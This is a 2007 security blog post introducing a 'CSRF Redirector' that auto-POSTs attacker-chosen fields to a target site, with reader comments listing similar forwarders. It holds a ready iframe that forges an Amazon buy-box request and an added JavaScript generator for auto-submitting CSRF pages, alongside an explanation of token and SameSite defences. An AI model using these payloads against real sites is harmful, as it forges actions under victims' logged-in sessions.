About the Author

Chris Shiflett

Chris Shiflett is an author and speaker who leads the web application security practice at OmniTI.


CSRF Redirector

Inspired by the XSS POST Forwarder, I just created the CSRF Redirector. It's a simple tool that makes it easy to test CSRF using POST, hopefully demonstrating how prevalent CSRF vulnerabilities are as well as dispelling the misconception that forging a POST request is complicated.

To use it, construct a URL of the form http://shiflett.org/csrf.php?csrf=URL&NAME=VALUE, where URL is the (URL-encoded) target site, and NAME and VALUE represent a name-value pair, of which there can be zero or more. The redirector turns those pairs into hidden form fields and submits the form to URL by POST as soon as the page loads, so the request is sent by the visitor's own browser with whatever cookies it holds for the target site.

For example, the following IFrame exploits the Amazon vulnerability; any visitor to a page containing it has the forged request POSTed to Amazon from their own browser:

<iframe src="http://shiflett.org/csrf.php?csrf=http%3A%2F%2Famazon.com%2Fgp%2Fproduct%2Fhandle-buy-box&ASIN=059600656X&offerListingID=XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7%2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE%2FfgEoOZN0Wyy5qYrwEFzXBuOgqf"></iframe>
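The mechanism the redirector relies on, as an added example that is not the source of csrf.php (the post does not publish it): a small JavaScript reimplementation that turns a redirector-style query string into the auto-submitting page such a tool serves. The target URL example.test and the field names in the sample query are constructed for illustration, and the http(s)-only check on the target is an added hardening step, not something the post describes.

```javascript
// Added example, not the source of shiflett.org/csrf.php. Given the
// redirector's own query string, csrf=<URL-encoded target>&NAME=VALUE...,
// it returns an HTML page holding a hidden form with those fields that
// POSTs itself to the target as soon as it loads. The victim's browser
// attaches its cookies for the target site to that POST; that is the trick.

// Split the redirector's query string into the target and the form fields.
// URLSearchParams percent-decodes names and values and treats '+' as a
// space, like a PHP $_GET parser. Names such as name[i] are kept verbatim.
function parseRedirectorQuery(query) {
  const params = new URLSearchParams(query.replace(/^\?/, ''));
  const target = params.get('csrf');
  if (target === null) {
    throw new Error('missing csrf= parameter naming the target URL');
  }
  // Added hardening: only accept http(s) targets. A javascript: target
  // would turn the redirector itself into an XSS sink.
  if (!/^https?:\/\//i.test(target)) {
    throw new Error('target must be an http(s) URL');
  }
  const fields = [];
  for (const [name, value] of params) {
    if (name !== 'csrf') fields.push({ name, value });
  }
  return { target, fields };
}

// Attribute-safe HTML escaping. The browser decodes the entities before
// submitting, so the target receives the original characters.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Render the auto-submitting page the redirector would serve.
function buildAutoSubmitPage(query) {
  const { target, fields } = parseRedirectorQuery(query);
  const inputs = fields.map(
    (f) => `  <input type="hidden" name="${escapeHtml(f.name)}" value="${escapeHtml(f.value)}">`
  );
  return [
    '<!DOCTYPE html>',
    '<html><body>',
    `<form id="csrf" method="post" action="${escapeHtml(target)}">`,
    ...inputs,
    '</form>',
    '<script>document.getElementById("csrf").submit();</script>',
    '</body></html>',
  ].join('\n');
}

// Constructed sample input (hypothetical target and fields), including a
// bracketed name and a value whose encoded characters must round-trip.
const SAMPLE_QUERY =
  'csrf=http%3A%2F%2Fexample.test%2Fcart%2Fadd&item=42&opts[gift]=yes&note=a%2Fb%2Bc%20%3Cd%3E';

console.log(buildAutoSubmitPage(SAMPLE_QUERY));
```

Running the block prints the generated page. Note what it does not need: it never sees the victim's cookies, because the browser adds them when it submits the form, which is why requiring POST is no protection at all. What the redirector cannot supply is a secret tied to the victim's session, so a per-session token in the real form, checked on submission, defeats it. (Browsers that default cookies to SameSite=Lax, which 2007 browsers did not, also withhold cookies from a cross-site POST.)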

I may add more features at some point. Until then, enjoy!

About This Post

CSRF Redirector was posted on Wed, 18 Jul 2007 at 03:49:53 GMT.

16 Comments

1. drew said:

CSRF redirectors are useful. I have one that I've been using internally that strips out the HTTP referrer header using the javascript: null-referrer technique. I've run into a handful of sites that check the referrer but are still vulnerable to CSRF using a null referrer.

Eventually I'll post a link to it on my blog... http://int2e.com/blog/

Wed, 18 Jul 2007 at 05:41:57 GMT


2. Sid said:

Nice idea, but I've already seen people using tinyurl for this purpose. Of course the only difference is that people can tell tinyurl to always preview links, in which case that won't work.

Wed, 18 Jul 2007 at 07:37:44 GMT


3. Sid said:

Sorry, it seems I can't read (just woke up). Of course tinyurl isn't being used for those POST CSRFs, just the GET ones. I have to say, though, that I fail to see how your script differs from my XSS POST forwarder script except that submission is automated in this one.

Mine could be used for CSRF (if it was automated) and yours can be used for XSS, so we made the same thing, didn't we?

Oh btw ;p

Wed, 18 Jul 2007 at 07:46:22 GMT


4. Chris Shiflett said:

Sid said: I fail to see how your script differs from my XSS POST forwarder script except that submission is automated in this one.

The automation is important for CSRF. In addition, it hides the response to the POST request, making the attack easier to conceal in various contexts.

And thanks for the bug report. :-)

Wed, 18 Jul 2007 at 13:59:27 GMT


5. drew said:

Neat, looks like the CSRF redirector works. ;)

However, I can't think of a way to make the link indefinitely replicate itself.

Wed, 18 Jul 2007 at 17:20:24 GMT


6. Chris Shiflett said:

Yes, it works. :-)

I first disclosed the fact that my comments form is vulnerable to CSRF about a year and a half ago:

http://shiflett.org/blog/2006/mar/p...ch-2006-edition

Surprisingly, no one has exploited the vulnerability, despite the fact that there have been countless XSS attempts.

Now that people can log in, I should address the vulnerability, but it's interesting to note that it hasn't been exploited until now. By contrast, the XSS vulnerability in the redirector was discovered (and fixed) within a few hours.

Wed, 18 Jul 2007 at 17:48:09 GMT


7. Chris Shiflett said:

Actually, to be clear, the CSRF vulnerability was exploited in the post where I mentioned it, but it hasn't been exploited since.

You might be wondering why I find this interesting or why I have honeypots on my site. The reason is that I want to be able to get a feel for the popularity (or lack thereof) of CSRF. I suspect the number of people actively trying to discover CSRF vulnerabilities is much smaller than the number of people actively trying to discover XSS vulnerabilities, and as soon as this is no longer true, CSRF is going to be a much bigger problem.

Wed, 18 Jul 2007 at 18:10:07 GMT


8. pdp said:

Hi Chris,

We have a CSRF forwarder script as well, located at: http://www.gnucitizen.org/util/csrf

It is quite tiny and flexible... there are plans to add features to hide the referer as well.

This is how I use it for GET:

http://www.gnucitizen.org/util/csrf?_method=GET&_url=http%3A//www.google.com/search&q=test

And this is for POST:

http://www.gnucitizen.org/util/csrf?_url=http%3A//www.google.com/search&q=test

http://www.gnucitizen.org/util/csrf?_method=POST&_url=http%3A//www.google.com/search&q=test

Quite simple.

Fri, 20 Jul 2007 at 14:28:59 GMT


9. killerguppy said:

Great little tool. I'm testing it on several vulnerable scripts I wrote a while ago for a demo.

Is there any way you could post the source code? I hate using tools if I have no idea how they work. Also, I'm interested to see if/how you got around cookie/session authentication. Every time I tried to make a tool like this, linking the vulnerable form to the victim user was always a huge problem that I couldn't get past without some XSS or a session ID in the URL....

Sun, 22 Jul 2007 at 17:14:14 GMT


10. q said:

Nice tool.

PS, I was the young college student at OSCON asking you a lot of questions after you got done with "Security 2.0".

Fri, 10 Aug 2007 at 00:04:32 GMT


11. q said:

Oh, by the way, the guy that was in the room before you at OSCON said some stuff in his session that was wrong. He said that if you make a form use POST it will be protected from CSRF. I didn't want to say anything because, like 2 seconds before he said this, he asked how many people had heard of CSRF and like 2 people raised their hands, including me. I don't think anyone would've taken me seriously, being a 17-year-old and looking like one. Besides, I don't like being at the center of attention. I also hate arguing. Maybe I should've said something.

Fri, 10 Aug 2007 at 07:33:57 GMT


12. Replyer said:

q said: Maybe I should've said something.

Sometimes you're better off saying nothing.

Sat, 11 Aug 2007 at 03:16:19 GMT


13. q said:

I posted about this on my new blog:

http://qqq3468349856.blogspot.com/

Mon, 13 Aug 2007 at 04:35:01 GMT


14. Steve said:

There's a useful online tool for converting GET requests to POST requests at:

http://www.gettopost.com

Just enter a URL and it will convert any GET parameters into a POST request and then submit the POST. It also accepts URLs tagged onto the base name, e.g.:

www.gettopost.com/gettopost.html?http://www.url.com?postparam1=value1

Also on the site is a useful bookmarklet for extracting the form parameter values that are filled in on all forms in any web page. HTH, Steve

Sat, 16 Feb 2008 at 13:42:42 GMT


15. Alexander Gre said:

> I've run into a handful of sites that check the referrer but are still vulnerable to CSRF using a null referrer.

How does it work? Can I see the HTML/JavaScript code?

Thu, 24 Apr 2008 at 21:14:35 GMT


16. MustLive said:

Chris,

As I wrote you by email, I recently found a bug in your CSRF redirector.

When using the char "[" (in ASCII or URL-encoded), it is removed along with the following characters from the query parameters (in the body of your redirector).

http://shiflett.org/csrf.php?csrf=h...amp;name[i]=val

So I wish you to fix this bug (add normal support for the "[" char) in your web application.

Tue, 09 Dec 2008 at 22:54:07 GMT

